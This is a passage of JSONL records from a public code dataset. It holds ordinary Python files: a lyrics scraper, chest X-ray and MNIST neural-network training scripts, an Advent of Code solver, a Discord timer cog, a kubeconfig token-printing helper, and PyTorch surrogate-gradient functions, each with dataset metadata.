"cv2.waitKey", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "34018316799", "text": "import json\r\nimport pylyrics3\r\nfrom flask import Flask, render_template\r\nimport markovify\r\n\r\n\r\n# app = Flask(__name__, 
static_url_path='/static')\r\ndef getlyrics():\r\n blinklyrics = pylyrics3.get_artist_lyrics('Blink-182')\r\n for k, v in blinklyrics.items():\r\n print(v)\r\n\r\n with open('blinklyrics.txt', 'w') as file:\r\n file.write(json.dumps(blinklyrics))\r\n with open(\"blinklyric.txt\", 'w') as f:\r\n for lyric in blinklyrics.values():\r\n f.write(lyric)\r\n\r\n # @app.route(\"/\")\r\n# def index():\r\n# ewords = smithize()\r\n# while ewords is None:\r\n# ewords = smithize()\r\n# return render_template(\"index.html\", words=ewords)\r\ngetlyrics()\r\n", "repo_name": "ReidTissing/sos", "sub_path": "blink.py", "file_name": "blink.py", "file_ext": "py", "file_size_in_byte": 689, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "pylyrics3.get_artist_lyrics", "line_number": 9, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "12065046472", "text": "import os \nimport ocifs\nfrom ocifs import OCIFileSystem\nfrom zipfile import ZipFile \nimport random\nimport shutil\nfrom ads.dataset.factory import DatasetFactory\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\n\nfs = OCIFileSystem()\n\n# Creating the local directory \ndirpath = f\"./data/\"\nif not os.path.exists(dirpath):\n os.makedirs(dirpath)\n\n# Downloading the data from Object Storage using OCIFS (https://github.com/oracle/ocifs)\nif os.path.exists(os.path.join(dirpath, \"chest_xrays.zip\")):\n with ZipFile(os.path.join(dirpath, \"chest_xrays.zip\"), 'r') as zipf:\n zipf.extractall(dirpath)\nelse:\n fs.download('oci://hosted-ds-datasets@bigdatadatasciencelarge/chest-xrays/ChestXRay2017.zip',os.path.join(dirpath, \"chest_xrays.zip\"))\n with ZipFile(os.path.join(dirpath, \"chest_xrays.zip\"), 'r') as zipf:\n zipf.extractall(dirpath)\n \ntrain_dir = \"./data/chest_xray/train/\"\ntest_dir = \"./data/chest_xray/test/\"\nvalid_dir = f\"./data/chest_xray/validation/\"\nif not os.path.exists(valid_dir):\n os.makedirs(valid_dir)\n \nnormal_train = \"./data/chest_xray/train/NORMAL/\"\npneumonia_train = \"./data/chest_xray/train/PNEUMONIA/\"\n\nnormal_images = os.listdir(normal_train)\npneumonia_images = os.listdir(pneumonia_train)\n\nvalid_dir_normal = os.path.join(valid_dir,\"NORMAL\")\nif not os.path.exists(valid_dir_normal):\n os.makedirs(valid_dir_normal)\n\nvalid_dir_pneumonia = os.path.join(valid_dir,\"PNEUMONIA\")\nif not os.path.exists(valid_dir_pneumonia):\n os.makedirs(valid_dir_pneumonia) \n \n# validation sample: \nnb_validation_normal = 8 \nnb_validation_pneumonia = 8 \n\nvalidation_normal_files = random.sample(normal_images, k=nb_validation_normal)\nvalidation_pneumonia_files = random.sample(pneumonia_images, k=nb_validation_pneumonia) \n\nfor x in validation_normal_files: \n shutil.move(os.path.join(normal_train,x),os.path.join(valid_dir_normal,x))\n\nfor x in validation_pneumonia_files: \n shutil.move(os.path.join(pneumonia_train,x),os.path.join(valid_dir_pneumonia,x))\n \nf_pneumonia_training = len(os.listdir(pneumonia_train)) / (len(os.listdir(pneumonia_train)) + len(os.listdir(normal_train)))\nf_normal_training = 1.0 - f_pneumonia_training\nprint(f'fraction pneumonia in training dataset : {f_pneumonia_training}')\nprint(f'fraction normal in training dataset : {f_normal_training}')\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimage_generator = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.1,\n shear_range=0.1,\n 
zoom_range=0.1,\n samplewise_center=True,\n samplewise_std_normalization=True\n)\n\ntrain = image_generator.flow_from_directory(train_dir, \n batch_size=8, \n shuffle=True, \n class_mode='binary',\n target_size=(180, 180))\n\nvalidation = image_generator.flow_from_directory(valid_dir, \n batch_size=1, \n shuffle=False, \n class_mode='binary',\n target_size=(180, 180))\n\n\ntest = image_generator.flow_from_directory(test_dir, \n batch_size=1, \n shuffle=False, \n class_mode='binary',\n target_size=(180, 180))\n\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import GlobalAveragePooling2D\nfrom tensorflow.keras.applications import VGG16, InceptionV3\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPool2D, Dropout, Flatten, BatchNormalization\nfrom tensorflow.keras.metrics import Accuracy, Precision, Recall\nfrom tensorflow.keras.optimizers import Adam\n\nvgg16_base_model = VGG16(input_shape=(180,180,3),\n include_top=False, \n weights='imagenet')\n\nvgg16_model = Sequential([\n vgg16_base_model,\n GlobalAveragePooling2D(),\n Dense(512, activation=\"relu\"),\n BatchNormalization(),\n Dropout(0.6),\n Dense(128, activation=\"relu\"),\n BatchNormalization(),\n Dropout(0.4),\n Dense(64,activation=\"relu\"),\n BatchNormalization(),\n Dropout(0.3),\n Dense(1,activation=\"sigmoid\")\n ])\n\n\noptimizer = Adam(learning_rate=0.001)\nMETRICS = ['accuracy', \n Precision(name='precision'),\n Recall(name='recall')]\n\nvgg16_model.compile(optimizer=optimizer,\n loss='binary_crossentropy',\n metrics=METRICS)\n\nclass_weight = {0: f_pneumonia_training, 1: f_normal_training}\n\nr = vgg16_model.fit(train,\n epochs=10,\n validation_data=validation,\n class_weight=class_weight,\n steps_per_epoch=100,\n validation_steps=25)\n\nevaluation =vgg16_model.evaluate(test)\nprint(f\"Test Accuracy: {evaluation[1] * 100:.2f}%\")\n\nevaluation = vgg16_model.evaluate(train)\nprint(f\"Train Accuracy: {evaluation[1] * 100:.2f}%\")\n\nvgg16_model.save(\"./vgg16.tf\",save_format='tf')\n\nprint('uploading model to object storage')\n\nfs.upload(\"./vgg16.tf\", \"oci://ds-models@bigdatadatasciencelarge/vgg16.tf\", recursive=True)\n\nprint('uploaded the model to object storage')", "repo_name": "oracle-samples/oci-data-science-ai-samples", "sub_path": "labs/xray-diagnostics/notebooks/training_vgg16.py", "file_name": "training_vgg16.py", "file_ext": "py", "file_size_in_byte": 5421, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 112, "dataset": "github-code", "pt": "41", "api": [{"api_name": "ocifs.OCIFileSystem", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 33, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 38, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 47, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 53, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 54, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.VGG16", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 109, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.GlobalAveragePooling2D", "line_number": 111, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 118, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 125, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.Precision", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.Recall", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "4102867052", "text": "import copy\nfrom typing import Optional\n\ndef step(map: [[str]], row: int, col: int) -> str:\n if map[row][col] == \"#\":\n return 
\"#\"\n\n neighbors = get_neighbors(map, row, col)\n if \"O\" in neighbors:\n return \"O\"\n else:\n return \".\"\n\ndef get_neighbors(map: [[str]], row: int, col: int) -> tuple[Optional[str], Optional[str], Optional[str], Optional[str]]:\n up = map[row - 1][col] if row - 1 >= 0 else None\n down = map[row + 1][col] if row + 1 < len(map) else None\n left = map[row][col - 1] if col - 1 >= 0 else None\n right = map[row][col + 1] if col + 1 < len(map[0]) else None\n\n return up, down, left, right\n\ndef walk(map: [[str]], steps: int) -> [str]:\n for row in range(len(map)):\n for col in range(len(map[row])):\n if map[row][col] == \"S\":\n map[row][col] = \"O\"\n\n this_map = copy.deepcopy(map)\n for _ in range(steps):\n next_map = copy.deepcopy(this_map)\n for row in range(len(this_map)):\n for col in range(len(this_map[row])):\n next_map[row][col] = step(this_map, row, col)\n this_map = next_map\n\n return next_map\n\ndef print_map(map: [[str]]) -> None:\n for row in map:\n print(\"\".join(row))\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(\"day21 solver\")\n parser.add_argument(\"input\", help=\"Path to the file containing puzzle input\")\n parser.add_argument(\"steps\", help=\"Number of steps to take\")\n args = parser.parse_args()\n\n with open(args.input) as f:\n lines = [list(line.rstrip()) for line in f]\n final_map = walk(lines, int(args.steps))\n sum = 0\n for line in final_map:\n sum += line.count(\"O\")\n print(sum)\n", "repo_name": "omivore/Advent-of-Code-2023", "sub_path": "21/solve/solve.py", "file_name": "solve.py", "file_ext": "py", "file_size_in_byte": 1751, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Optional", "line_number": 14, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 28, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "6757366944", "text": "import numpy as np\nimport tensorflow as tf\nimport os\nimport LoadData as LD\nfrom tensorflow.core.framework import summary_pb2\nimport datetime\nimport deep_Core.green_functions as gf\nfrom numba import cuda\nimport deep_Core.inception_modules as im\n\ndef main():\n # data path\n TrainPath = 'data\\mnist_train.csv'\n TestPath = 'data\\mnist_test.csv'\n\n # To load from a previous model\n Model_file_path = os.getcwd()+'/model.ckpt'\n\n #accuracy of model\n def accuracy(target,predictions):\n return(100.0*np.sum(np.argmax(target,1) == np.argmax(predictions,1))/target.shape[0])\n\n batch_size = 50\n test_batch_size = 100\n output_map1 = 32\n output_map2 = 64\n no_HiddenNodes = 700 #1024\n no_OutputNodes = 10\n dropout_rate=0.5\n use_gid = True\n learning_rate = 1e-4\n im_width = 28\n im_height = 28\n im_pix = im_height * im_width\n num_steps = 20000\n\n\n\n # batch_size: training batch size\n # output_map1: number of feature maps output by each tower inside the first Inception module\n # output_map2: number of feature maps output by each tower inside the second Inception module\n # no_HiddenNodes: number of hidden nodes\n # No_OutputNodes: number of output nodes\n # OutputConv1x1: number of feature maps output by each 1×1 convolution that precedes a large convolution\n # dropout_rate: dropout rate for nodes in the hidden layer during training\n\n # Load the data\n data = LD.LoadData(TrainPath, TestPath)\n trainX, testX, valX, 
train_label, test_label, val_label = data.LoadMNIST()\n\n    graph = tf.Graph()\n    with graph.as_default():\n        # train data and labels\n        X = tf.placeholder(tf.float32, shape=(None, im_width, im_height, 1))\n        y_ = tf.placeholder(tf.float32, shape=(None, 10))\n\n        def createWeight(size, Name):\n            return tf.Variable(tf.truncated_normal(size, stddev=0.1), name=Name)\n\n        def createBias(size, Name):\n            return tf.Variable(tf.constant(0.1, shape=size), name=Name)\n\n\n        input_map1 = 4 * output_map1\n        input_map2 = 4 * output_map2\n\n\n        ############ Fully connected layers #############\n        # since padding is 'same', the feature maps there will be 4 * 28*28*output_map2\n        W_fc1 = createWeight([input_map2 * im_pix, no_HiddenNodes], 'W_fc1')\n        b_fc1 = createBias([no_HiddenNodes], 'b_fc1')\n\n        W_fc2 = createWeight([no_HiddenNodes, no_OutputNodes], 'W_fc2')\n        b_fc2 = createBias([no_OutputNodes], 'b_fc2')\n\n        if use_gid:\n            green_function = gf.create_green_function((im_width, im_height))\n        else:\n            green_function = None\n\n        def model(x):\n\n            in_1 = im.inception_module_v1(x, output_map1, 'in_1', green_function=green_function)\n            in_2 = im.inception_module_v1(in_1, output_map2, 'in_2', green_function=green_function)\n\n            # flatten features for fully connected layer\n            inception2_flat = tf.reshape(in_2, [-1, im_pix * input_map2])\n\n            # Fully connected layers\n            h_fc1_train = tf.nn.dropout(tf.nn.relu(tf.matmul(inception2_flat, W_fc1) + b_fc1), dropout_rate)\n            out_train = tf.matmul(h_fc1_train, W_fc2) + b_fc2\n\n            h_fc1_not_train = tf.nn.relu(tf.matmul(inception2_flat, W_fc1) + b_fc1)\n            out_not_train = tf.matmul(h_fc1_not_train, W_fc2) + b_fc2\n            return out_train, out_not_train\n\n        out_train, out_not_train = model(X)\n        loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=out_train, labels=y_))\n        opt = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\n        predictions_val = tf.nn.softmax(out_not_train)\n        predictions_test = tf.nn.softmax(out_not_train)\n\n        # initialize variables\n        init = tf.initialize_all_variables()\n\n        # use to save variables so we can pick up later\n        saver = tf.train.Saver()\n\n    sess = tf.Session(graph=graph)\n\n    # initialize variables\n    run_metadata = tf.RunMetadata()\n    sess.run(init, run_metadata=run_metadata)\n    print(\"Model initialized.\")\n    time_str = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n    val_writer_path = os.path.join('log_files', 'val_' + time_str)\n    if not os.path.exists(val_writer_path):\n        os.makedirs(val_writer_path)\n    val_writer = tf.summary.FileWriter(val_writer_path, sess.graph)\n    val_writer.add_run_metadata(run_metadata, 'step%d' % 0)\n\n\n\n\n    # set use_previous=1 to use file_path model\n    # set use_previous=0 to start model from scratch\n    use_previous = 0\n\n    # use the previous model or don't and initialize variables\n    if use_previous:\n        saver.restore(sess, Model_file_path)\n        print(\"Model restored.\")\n\n\n\n    # training\n    for s in range(num_steps):\n        offset = (s * batch_size) % (len(trainX) - batch_size)\n        batch_x, batch_y = trainX[offset:(offset + batch_size), :], train_label[offset:(offset + batch_size), :]\n        feed_dict = {X: batch_x, y_: batch_y}\n        _, loss_value = sess.run([opt, loss], feed_dict=feed_dict)\n        if s % 100 == 0:\n            feed_dict = {X: valX}\n            preds = sess.run(predictions_val, feed_dict=feed_dict)\n            val_accuracy = accuracy(val_label, preds)\n            this_summary = summary_pb2.Summary(value=[summary_pb2.Summary.Value(tag='val_accuracy', simple_value=val_accuracy)])\n            val_writer.add_summary(this_summary, s)\n\n            print(\"step: \" + str(s))\n            print(\"loss value: \" 
+ str(loss_value))\n print(\"validation accuracy: \" + str(val_accuracy))\n print(\" \")\n\n # get test accuracy and save model\n if s == (num_steps - 1):\n # create an array to store the outputs for the test\n result = np.array([]).reshape(0, 10)\n\n for i in range(int(len(testX) / test_batch_size)):\n feed_dict = {X: data.next_test_batches(testX, test_batch_size)}\n preds = sess.run(predictions_test, feed_dict=feed_dict)\n result = np.concatenate((result, preds), axis=0)\n\n print(\"test accuracy: \" + str(accuracy(test_label, result)))\n save_path = saver.save(sess, Model_file_path)\n print(\"Model saved.\")\n\n sess.close()\n cuda.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "AbolfazlMohebbi/InceptionV3", "sub_path": "InceptionV1.py", "file_name": "InceptionV1.py", "file_ext": "py", "file_size_in_byte": 6279, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.getcwd", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 21, "usage_type": "call"}, {"api_name": "LoadData.LoadData", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.Graph", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 61, "usage_type": "call"}, {"api_name": "deep_Core.green_functions.create_green_function", "line_number": 77, "usage_type": "call"}, {"api_name": "deep_Core.green_functions", "line_number": 77, "usage_type": "name"}, {"api_name": "deep_Core.inception_modules.inception_module_v1", "line_number": 83, "usage_type": "call"}, {"api_name": "deep_Core.inception_modules", "line_number": 83, "usage_type": "name"}, {"api_name": "deep_Core.inception_modules.inception_module_v1", "line_number": 84, "usage_type": "call"}, {"api_name": "deep_Core.inception_modules", "line_number": 84, "usage_type": "name"}, {"api_name": "tensorflow.reshape", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 98, 
"usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tensorflow.initialize_all_variables", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 108, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 110, "usage_type": "call"}, {"api_name": "tensorflow.RunMetadata", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 116, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 120, "usage_type": "attribute"}, {"api_name": "tensorflow.core.framework.summary_pb2.Summary", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.core.framework.summary_pb2", "line_number": 147, "usage_type": "name"}, {"api_name": "tensorflow.core.framework.summary_pb2.Summary.Value", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 163, "usage_type": "call"}, {"api_name": "numba.cuda.close", "line_number": 170, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 170, "usage_type": "name"}]} +{"seq_id": "42708945465", "text": "import discord\nfrom discord.ext import commands\n\nimport Utils\n\nimport core._Timer as _Timer\n\nimport time\nimport asyncio\nfrom core import logger\n\nclass Timer(commands.Cog):\n \"\"\"\n Timer cog: get a visual countdown\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.group(aliases = [\"t\"])\n @commands.guild_only()\n async def timer (self, ctx: commands.Context, duration_str: str):\n \"\"\"\n Launch a countdown for .\n must be in the form XjXhXmXs.\n Example: 1j2h5m32s =w 1 day 2 housr 5 minutes 32 seconds\n \"\"\"\n try:\n duration = Utils.parse_time(duration_str)\n if duration < 1:\n await ctx.send (\"Duration must be a positive integer !\")\n return\n start = time.time()\n # GET EMOJI\n emoji = Utils.emojize (\":red_circle:\")\n # GET END MESSAGE\n end_message = \"**Time's Up !**\"\n global emoji_row_length\n emoji_row_length = duration if duration <= 10 else 10\n emoji_row = (str (emoji)+\" \" ) * emoji_row_length\n msg_timer = await ctx.send (emoji_row)\n lag = 0.2\n interval = duration / emoji_row_length - lag\n\n async def times_up():\n logger (\"timer::launch\", \"times_up -> time : {:.1f}s\".format(time.time()-start))\n await ctx.send (end_message)\n # await msg_timer.edit (content=end_message)\n\n async def 
times_up_2():\n logger (\"timer::launch\", \"Time's up ! -> time : {:.1f}s\".format(time.time()-start))\n await ctx.send (\"Time's up ! -> time : {:.1f}s\".format(time.time()-start))\n\n async def rebuild ():\n #proc_start = time.time()\n global emoji_row_length\n emoji_row_length = emoji_row_length - 1\n emoji_row = (str (emoji)+\" \" ) * emoji_row_length\n if emoji_row_length:\n await msg_timer.edit (content=emoji_row)\n if time.time()-start < duration:\n next_task = _Timer (interval, rebuild)\n else:\n logger (\"timer::launch\", \"rebuild -> time : {:.1f}s\".format(time.time()-start))\n #logger (\"timer::launch\", time.time()-proc_start)\n\n #reftimer = _Timer (duration, times_up_2) # Reference Timer\n timer = _Timer (duration, times_up)\n next_task = _Timer (interval, rebuild)\n await ctx.message.delete(delay=0.5)\n except Exception as e:\n await ctx.send (f\"{type(e).__name__} - {e}\")\n return\n", "repo_name": "Super-Thomate/game-master", "sub_path": "cogs/timer/timer.py", "file_name": "timer.py", "file_ext": "py", "file_size_in_byte": 2565, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 12, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 12, "usage_type": "name"}, {"api_name": "discord.ext.commands.Context", "line_number": 22, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 22, "usage_type": "name"}, {"api_name": "Utils.parse_time", "line_number": 29, "usage_type": "call"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "Utils.emojize", "line_number": 35, "usage_type": "call"}, {"api_name": "core.logger", "line_number": 46, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "core.logger", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "core._Timer", "line_number": 62, "usage_type": "call"}, {"api_name": "core.logger", "line_number": 64, "usage_type": "call"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "core._Timer", "line_number": 68, "usage_type": "call"}, {"api_name": "core._Timer", "line_number": 69, "usage_type": "call"}, {"api_name": "discord.ext.commands.group", "line_number": 20, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 20, "usage_type": "name"}, {"api_name": "discord.ext.commands.guild_only", "line_number": 21, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "71791309898", "text": "#!/usr/bin/env python\n\nfrom os.path import expanduser\nimport sys\nimport yaml\n\nwith open(expanduser(\"~\")+\"/.kube/config\", 'r') as f:\n try:\n config = yaml.safe_load(f)\n for user in config['users']:\n if user['name'] == config['current-context']:\n print(user['user']['token'])\n sys.exit()\n print('user not found')\n except yaml.YAMLError as exc:\n print(exc)\n", "repo_name": "jpbetz/conversion-webhook-example", "sub_path": "hack/current-token.py", "file_name": "current-token.py", "file_ext": "py", "file_size_in_byte": 386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "46", "api": [{"api_name": 
"os.path.expanduser", "line_number": 7, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 13, "usage_type": "call"}, {"api_name": "yaml.YAMLError", "line_number": 15, "usage_type": "attribute"}]} +{"seq_id": "74771809404", "text": "import torch\n\nfrom collections import OrderedDict\nfrom torchmeta.modules import MetaModule\n\nimport torch.nn.functional as F\n\nimport pdb\n\nfrom matplotlib import pyplot as plt\n\nclass FastSigmoid(torch.autograd.Function):\n @staticmethod\n def forward(ctx, input_, th=0):\n ctx.save_for_backward(input_)\n return (input_>th).type(input_.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n (input_,) = ctx.saved_tensors\n grad_input = grad_output.clone()\n return grad_input / (10 * torch.abs(input_) + 1.0) ** 2\n \n \n# class FastSigmoid(torch.autograd.Function):\n# @staticmethod\n# def forward(ctx, input_,th=0):\n# ctx.save_for_backward(input_)\n# return input_ / (1+torch.abs(input_))\n\n# @staticmethod\n# def backward(ctx, grad_output):\n# (input_,) = ctx.saved_tensors\n# grad_input = grad_output.clone()\n# return grad_input / (torch.abs(input_) + 1.0) ** 2#, None\n \nfast_sigmoid = FastSigmoid.apply\n \n\nclass ThresholdSurrogate(torch.autograd.Function):\n # need two sigmoids, or maybe 1 - fast sigmoid deriviative\n # similar to fast sigmoid but need >th and <-th so two directions\n # impulse that goes to zero, look at updated notes up\n \n # Very similar to FastSigmoid, the difference is the negative threshold\n @staticmethod\n def forward(ctx, input_, th): #not sure what to set the threshold at, will likely need to experiment\n \"\"\"\n Parameters\n ----------\n input_: The input, which should be dLdS which is the error\n th: the threshold that triggers learning\n \n Returns\n -------\n thresholded input_\n \"\"\" \n ctx.save_for_backward(input_,th)\n \n return input_*((input_>th).type(input_.dtype) + (input_<-th).type(input_.dtype))\n\n \n # this is FastSigmoid derivative\n @staticmethod\n def backward(ctx, grad_output):\n (input_,th) = ctx.saved_tensors\n grad_input = grad_output.clone()\n return ((input_>th).type(input_.dtype) + (input_<-th).type(input_.dtype)) #(grad_input / (10 * torch.abs(input_) + 1.0) ** 2)\n \n \nerror_trigger = ThresholdSurrogate.apply\n\n\ndef grad_flow(path, grad):\n # helps monitor the gradient flow\n #pdb.set_trace() \n grad_norm = [torch.norm(g).item()/torch.numel(g) for g in grad] \n\n plt.figure()\n plt.semilogy(grad_norm)\n plt.savefig(path + 'gradFlow_inner_D.png')\n plt.close()\n \n\ndef cross_entropy_gradient(S, targets):\n # assuming softmax function\n # this is same as Ei\n # print(\"cross entropy\")\n \n S.retain_grad()\n loss = torch.mean(-torch.sum(targets * torch.log(F.softmax(S, dim=1)), 